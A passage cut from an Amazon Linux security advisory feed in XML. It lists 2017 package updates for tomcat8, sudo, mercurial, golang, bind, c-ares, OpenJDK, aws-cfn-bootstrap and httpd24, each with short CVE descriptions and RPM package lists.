vulnerabilities:
CVE-2017-5664:
A vulnerability was discovered in the error page mechanism in Tomcat&#039;s DefaultServlet implementation. A crafted HTTP request could cause undesired side effects, possibly including the removal or replacement of the custom error page.
1459158:
CVE-2017-5664 tomcat: Security constrained bypass in error page mechanism
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5664" title="" id="CVE-2017-5664" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8" version="8.0.44" release="1.71.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.0.44-1.71.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.0.44" release="1.71.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.0.44-1.71.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.0.44" release="1.71.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.0.44-1.71.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.0.44" release="1.71.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.0.44-1.71.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.0.44" release="1.71.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.0.44-1.71.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.0.44" release="1.71.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.0.44-1.71.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.0.44" release="1.71.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.0.44-1.71.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.0.44" release="1.71.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.0.44-1.71.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.0.44" release="1.71.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.0.44-1.71.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.0.44" release="1.71.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.0.44-1.71.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-855</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-855: medium priority package update for sudo</title><issued date="2017-07-06 19:03:00" /><updated date="2017-07-06 22:56:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-1000368:
* It was found that the original fix for CVE-2017-1000367 was incomplete. A flaw was found in the way sudo parsed tty information from the process status file in the proc filesystem. A local user with privileges to execute commands via sudo could use this flaw to escalate their privileges to root.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000368" title="" id="CVE-2017-1000368" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2017:1574.html" title="" id="RHSA-2017:1574" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="sudo" version="1.8.6p3" release="29.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-1.8.6p3-29.27.amzn1.x86_64.rpm</filename></package><package name="sudo-debuginfo" version="1.8.6p3" release="29.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-debuginfo-1.8.6p3-29.27.amzn1.x86_64.rpm</filename></package><package name="sudo-devel" version="1.8.6p3" release="29.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-devel-1.8.6p3-29.27.amzn1.x86_64.rpm</filename></package><package name="sudo" version="1.8.6p3" release="29.27.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-1.8.6p3-29.27.amzn1.i686.rpm</filename></package><package name="sudo-debuginfo" version="1.8.6p3" release="29.27.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-debuginfo-1.8.6p3-29.27.amzn1.i686.rpm</filename></package><package name="sudo-devel" version="1.8.6p3" release="29.27.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-devel-1.8.6p3-29.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-856</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-856: important priority package update for mercurial</title><issued date="2017-07-06 19:06:00" /><updated date="2017-07-06 22:57:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-9462:
A flaw was found in the way &quot;hg serve --stdio&quot; command in Mercurial handled command-line options. A remote, authenticated attacker could use this flaw to execute arbitrary code on the Mercurial server by using specially crafted command-line options.
1459482:
CVE-2017-9462 mercurial: Python debugger accessible to authorized users
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9462" title="" id="CVE-2017-9462" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mercurial-python27" version="3.7.3" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mercurial-python27-3.7.3-1.28.amzn1.x86_64.rpm</filename></package><package name="mercurial-python26" version="3.7.3" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mercurial-python26-3.7.3-1.28.amzn1.x86_64.rpm</filename></package><package name="emacs-mercurial" version="3.7.3" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/emacs-mercurial-3.7.3-1.28.amzn1.x86_64.rpm</filename></package><package name="mercurial-common" version="3.7.3" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mercurial-common-3.7.3-1.28.amzn1.x86_64.rpm</filename></package><package name="mercurial-debuginfo" version="3.7.3" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mercurial-debuginfo-3.7.3-1.28.amzn1.x86_64.rpm</filename></package><package name="emacs-mercurial-el" version="3.7.3" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/emacs-mercurial-el-3.7.3-1.28.amzn1.x86_64.rpm</filename></package><package name="mercurial-python26" version="3.7.3" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/mercurial-python26-3.7.3-1.28.amzn1.i686.rpm</filename></package><package name="mercurial-debuginfo" version="3.7.3" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/mercurial-debuginfo-3.7.3-1.28.amzn1.i686.rpm</filename></package><package name="mercurial-common" version="3.7.3" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/mercurial-common-3.7.3-1.28.amzn1.i686.rpm</filename></package><package name="mercurial-python27" version="3.7.3" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/mercurial-python27-3.7.3-1.28.amzn1.i686.rpm</filename></package><package name="emacs-mercurial-el" version="3.7.3" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/emacs-mercurial-el-3.7.3-1.28.amzn1.i686.rpm</filename></package><package name="emacs-mercurial" version="3.7.3" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/emacs-mercurial-3.7.3-1.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-857</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-857: medium priority package update for golang</title><issued date="2017-07-13 19:37:00" /><updated date="2017-07-14 23:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-8932:
A carry propagation flaw was found in the implementation of the P-256 elliptic curve in golang. An attacker could use this flaw to extract private keys when static ECDH is used.
1455189:
CVE-2017-8932 golang: Elliptic curves carry propagation issue in x86-64 P-256
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8932" title="" id="CVE-2017-8932" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-tests" version="1.7.5" release="2.39.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.7.5-2.39.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.7.5" release="2.39.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.7.5-2.39.amzn1.noarch.rpm</filename></package><package name="golang-misc" version="1.7.5" release="2.39.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.7.5-2.39.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.7.5" release="2.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.7.5-2.39.amzn1.x86_64.rpm</filename></package><package name="golang" version="1.7.5" release="2.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.7.5-2.39.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.7.5" release="2.39.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.7.5-2.39.amzn1.noarch.rpm</filename></package><package name="golang" version="1.7.5" release="2.39.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.7.5-2.39.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.7.5" release="2.39.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.7.5-2.39.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-858</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-858: important priority package update for bind</title><issued date="2017-07-20 01:20:00" /><updated date="2017-07-24 23:16:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3143:
* A flaw was found in the way BIND handled TSIG authentication for dynamic updates. A remote attacker able to communicate with an authoritative BIND server could use this flaw to manipulate the contents of a zone, by forging a valid TSIG or SIG(0) signature for a dynamic update request.
CVE-2017-3142:
* A flaw was found in the way BIND handled TSIG authentication of AXFR requests. A remote attacker, able to communicate with an authoritative BIND server, could use this flaw to view the entire contents of a zone by sending a specially constructed request packet.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3142" title="" id="CVE-2017-3142" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3143" title="" id="CVE-2017-3143" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2017:1679.html" title="" id="RHSA-2017:1679" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-devel" version="9.8.2" release="0.62.rc1.56.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.62.rc1.56.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.62.rc1.56.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.62.rc1.56.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.62.rc1.56.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.62.rc1.56.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.62.rc1.56.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.62.rc1.56.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.62.rc1.56.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.62.rc1.56.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.62.rc1.56.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.62.rc1.56.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.62.rc1.56.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.62.rc1.56.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.62.rc1.56.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.62.rc1.56.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.62.rc1.56.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.62.rc1.56.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.62.rc1.56.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.62.rc1.56.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.62.rc1.56.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.62.rc1.56.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.62.rc1.56.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.62.rc1.56.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.62.rc1.56.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.62.rc1.56.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.62.rc1.56.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.62.rc1.56.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-859</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-859: medium priority package update for c-ares</title><issued date="2017-07-20 01:22:00" /><updated date="2017-07-24 23:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-1000381:
The c-ares function `ares_parse_naptr_reply()`, which is used for parsing NAPTR responses, could be triggered to read memory outside of the given input buffer if the passed in DNS response packet was crafted in a particular way.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000381" title="" id="CVE-2017-1000381" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="c-ares-devel" version="1.13.0" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/c-ares-devel-1.13.0-1.5.amzn1.x86_64.rpm</filename></package><package name="c-ares" version="1.13.0" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/c-ares-1.13.0-1.5.amzn1.x86_64.rpm</filename></package><package name="c-ares-debuginfo" version="1.13.0" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/c-ares-debuginfo-1.13.0-1.5.amzn1.x86_64.rpm</filename></package><package name="c-ares-devel" version="1.13.0" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/c-ares-devel-1.13.0-1.5.amzn1.i686.rpm</filename></package><package name="c-ares-debuginfo" version="1.13.0" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/c-ares-debuginfo-1.13.0-1.5.amzn1.i686.rpm</filename></package><package name="c-ares" version="1.13.0" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/c-ares-1.13.0-1.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-860</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-860: critical priority package update for java-1.8.0-openjdk</title><issued date="2017-07-25 17:54:00" /><updated date="2017-07-25 17:56:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-10198:
It was discovered that the Security component of OpenJDK could fail to properly enforce restrictions defined for processing of X.509 certificate chains. A remote attacker could possibly use this flaw to make Java accept certificate using one of the disabled algorithms.
1472320:
CVE-2017-10198 OpenJDK: incorrect enforcement of certificate path restrictions (Security, 8179998)
CVE-2017-10193:
1471715:
CVE-2017-10193 OpenJDK: incorrect key size constraint check (Security, 8179101)
CVE-2017-10135:
A covert timing channel flaw was found in the PKCS#8 implementation in the JCE component of OpenJDK. A remote attacker able to make a Java application repeatedly compare PKCS#8 key against an attacker controlled value could possibly use this flaw to determine the key via a timing side channel.
1471871:
CVE-2017-10135 OpenJDK: PKCS#8 implementation timing attack (JCE, 8176760)
CVE-2017-10116:
It was discovered that the LDAPCertStore class in the Security component of OpenJDK followed LDAP referrals to arbitrary URLs. A specially crafted LDAP referral URL could cause LDAPCertStore to communicate with non-LDAP servers.
1471738:
CVE-2017-10116 OpenJDK: LDAPCertStore following referrals to non-LDAP URLs (Security, 8176067)
CVE-2017-10115:
A covert timing channel flaw was found in the DSA implementation in the JCE component of OpenJDK. A remote attacker able to make a Java application generate DSA signatures on demand could possibly use this flaw to extract certain information about the used key via a timing side channel.
1471851:
CVE-2017-10115 OpenJDK: DSA implementation timing attack (JCE, 8175106)
CVE-2017-10111:
1471526:
CVE-2017-10111 OpenJDK: incorrect range checks in LambdaFormEditor (Libraries, 8184185)
CVE-2017-10110:
1471523:
CVE-2017-10110 OpenJDK: insufficient access control checks in ImageWatched (AWT, 8174098)
CVE-2017-10109:
1471670:
CVE-2017-10109 OpenJDK: unbounded memory allocation in CodeSource deserialization (Serialization, 8174113)
CVE-2017-10108:
1471888:
CVE-2017-10108 OpenJDK: unbounded memory allocation in BasicAttribute deserialization (Serialization, 8174105)
CVE-2017-10107:
1471266:
CVE-2017-10107 OpenJDK: insufficient access control checks in ActivationID (RMI, 8173697)
CVE-2017-10102:
It was discovered that the DCG implementation in the RMI component of OpenJDK failed to correctly handle references. A remote attacker could possibly use this flaw to execute arbitrary code with the privileges of RMI registry or a Java RMI application.
1472345:
CVE-2017-10102 OpenJDK: incorrect handling of references in DGC (RMI, 8163958)
CVE-2017-10101:
1471527:
CVE-2017-10101 OpenJDK: unrestricted access to com.sun.org.apache.xml.internal.resolver (JAXP, 8173286)
CVE-2017-10096:
1471528:
CVE-2017-10096 OpenJDK: insufficient access control checks in XML transformations (JAXP, 8172469)
CVE-2017-10090:
1471517:
CVE-2017-10090 OpenJDK: insufficient access control checks in AsynchronousChannelGroupImpl (8172465, Libraries)
CVE-2017-10074:
1471534:
CVE-2017-10074 OpenJDK: integer overflows in range check loop predicates (Hotspot, 8173770)
CVE-2017-10067:
1471535:
CVE-2017-10067 OpenJDK: JAR verifier incorrect handling of missing digest (Security, 8169392)
CVE-2017-10053:
It was discovered that the JPEGImageReader implementation in the 2D component of OpenJDK would, in certain cases, read all image data even if it was not used later. A specially crafted image could cause a Java application to temporarily use an excessive amount of CPU and memory.
1471889:
CVE-2017-10053 OpenJDK: reading of unprocessed image data in JPEGImageReader (2D, 8169209)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10053" title="" id="CVE-2017-10053" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10067" title="" id="CVE-2017-10067" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10074" title="" id="CVE-2017-10074" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10090" title="" id="CVE-2017-10090" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10096" title="" id="CVE-2017-10096" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10101" title="" id="CVE-2017-10101" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10102" title="" id="CVE-2017-10102" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10107" title="" id="CVE-2017-10107" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10108" title="" id="CVE-2017-10108" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10109" title="" id="CVE-2017-10109" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10110" title="" id="CVE-2017-10110" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10111" title="" id="CVE-2017-10111" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10115" title="" id="CVE-2017-10115" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10116" title="" id="CVE-2017-10116" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10135" title="" id="CVE-2017-10135" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10193" title="" id="CVE-2017-10193" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10198" title="" id="CVE-2017-10198" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.141" release="1.b16.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.141-1.b16.32.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.141" release="1.b16.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.141-1.b16.32.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.141" release="1.b16.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.141-1.b16.32.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.141" release="1.b16.32.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.141-1.b16.32.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.141" release="1.b16.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.141-1.b16.32.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.141" release="1.b16.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.141-1.b16.32.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.141" release="1.b16.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.141-1.b16.32.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.141" release="1.b16.32.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.141-1.b16.32.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.141" release="1.b16.32.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.141-1.b16.32.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.141" release="1.b16.32.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.141-1.b16.32.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.141" release="1.b16.32.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.141-1.b16.32.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.141" release="1.b16.32.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.141-1.b16.32.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.141" release="1.b16.32.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.141-1.b16.32.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.141" release="1.b16.32.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.141-1.b16.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-861</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-861: important priority package update for aws-cfn-bootstrap</title><issued date="2017-07-25 18:33:00" /><updated date="2017-08-04 03:33:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-9450:
A vulnerability was reported in the CloudFormation bootstrap tools that allows an attacker to execute arbitrary code as root if they have local access to the system and are able to create files in a specific directory (CVE-2017-9450 )
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9450" title="" id="CVE-2017-9450" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="aws-cfn-bootstrap" version="1.4" release="19.10.amzn1" epoch="0" arch="noarch"><filename>Packages/aws-cfn-bootstrap-1.4-19.10.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-862</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-862: important priority package update for tomcat8</title><issued date="2017-08-03 18:49:00" /><updated date="2017-08-31 23:17:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7674:
The CORS Filter in Apache Tomcat 9.0.0.M1 to 9.0.0.M21, 8.5.0 to 8.5.15, 8.0.0.RC1 to 8.0.44 and 7.0.41 to 7.0.78 did not add an HTTP Vary header indicating that the response varies depending on Origin. This permitted client and server side cache poisoning in some circumstances.
1480618:
CVE-2017-7674 tomcat: Vary header not added by CORS filter leading to cache poisoning
CVE-2017-5664:
A vulnerability was discovered in the error page mechanism in Tomcat&#039;s DefaultServlet implementation. A crafted HTTP request could cause undesired side effects, possibly including the removal or replacement of the custom error page.
1459158:
CVE-2017-5664 tomcat: Security constrained bypass in error page mechanism
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5664" title="" id="CVE-2017-5664" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7674" title="" id="CVE-2017-7674" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-webapps" version="8.0.45" release="1.72.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.0.45-1.72.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.0.45" release="1.72.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.0.45-1.72.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.0.45" release="1.72.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.0.45-1.72.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.0.45" release="1.72.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.0.45-1.72.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.0.45" release="1.72.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.0.45-1.72.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.0.45" release="1.72.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.0.45-1.72.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.0.45" release="1.72.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.0.45-1.72.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.0.45" release="1.72.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.0.45-1.72.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.0.45" release="1.72.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.0.45-1.72.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.0.45" release="1.72.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.0.45-1.72.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-863</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-863: medium priority package update for httpd24</title><issued date="2017-08-03 18:53:00" /><updated date="2017-08-04 00:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7679:
A buffer over-read flaw was found in the httpd&#039;s mod_mime module. A user permitted to modify httpd&#039;s MIME configuration could use this flaw to cause httpd child process to crash.
1463207:
CVE-2017-7679 httpd: mod_mime buffer overread
CVE-2017-7668:
A buffer over-read flaw was found in the httpd&#039;s ap_find_token() function. A remote attacker could use this flaw to cause httpd child process to crash via a specially crafted HTTP request.
1463205:
CVE-2017-7668 httpd: ap_find_token() buffer overread
CVE-2017-7659:
A NULL pointer dereference flaw was found in the mod_http2 module of httpd. A remote attacker could use this flaw to cause httpd child process to crash via a specially crafted HTTP/2 request.
1463199:
CVE-2017-7659 httpd: mod_http2 NULL pointer dereference
CVE-2017-3169:
A NULL pointer dereference flaw was found in the httpd&#039;s mod_ssl module. A remote attacker could use this flaw to cause a httpd child process to crash if another module used by httpd called a certain API function during the processing of an HTTPS request.
1463197:
CVE-2017-3169 httpd: mod_ssl NULL pointer dereference
CVE-2017-3167:
It was discovered that the use of httpd&#039;s ap_get_basic_auth_pw() API function outside of the authentication phase could lead to authentication bypass. A remote attacker could possibly use this flaw to bypass required authentication if the API was used incorrectly by one of the modules used by httpd.
1463194:
CVE-2017-3167 httpd: ap_get_basic_auth_pw() authentication bypass
CVE-2016-8743:
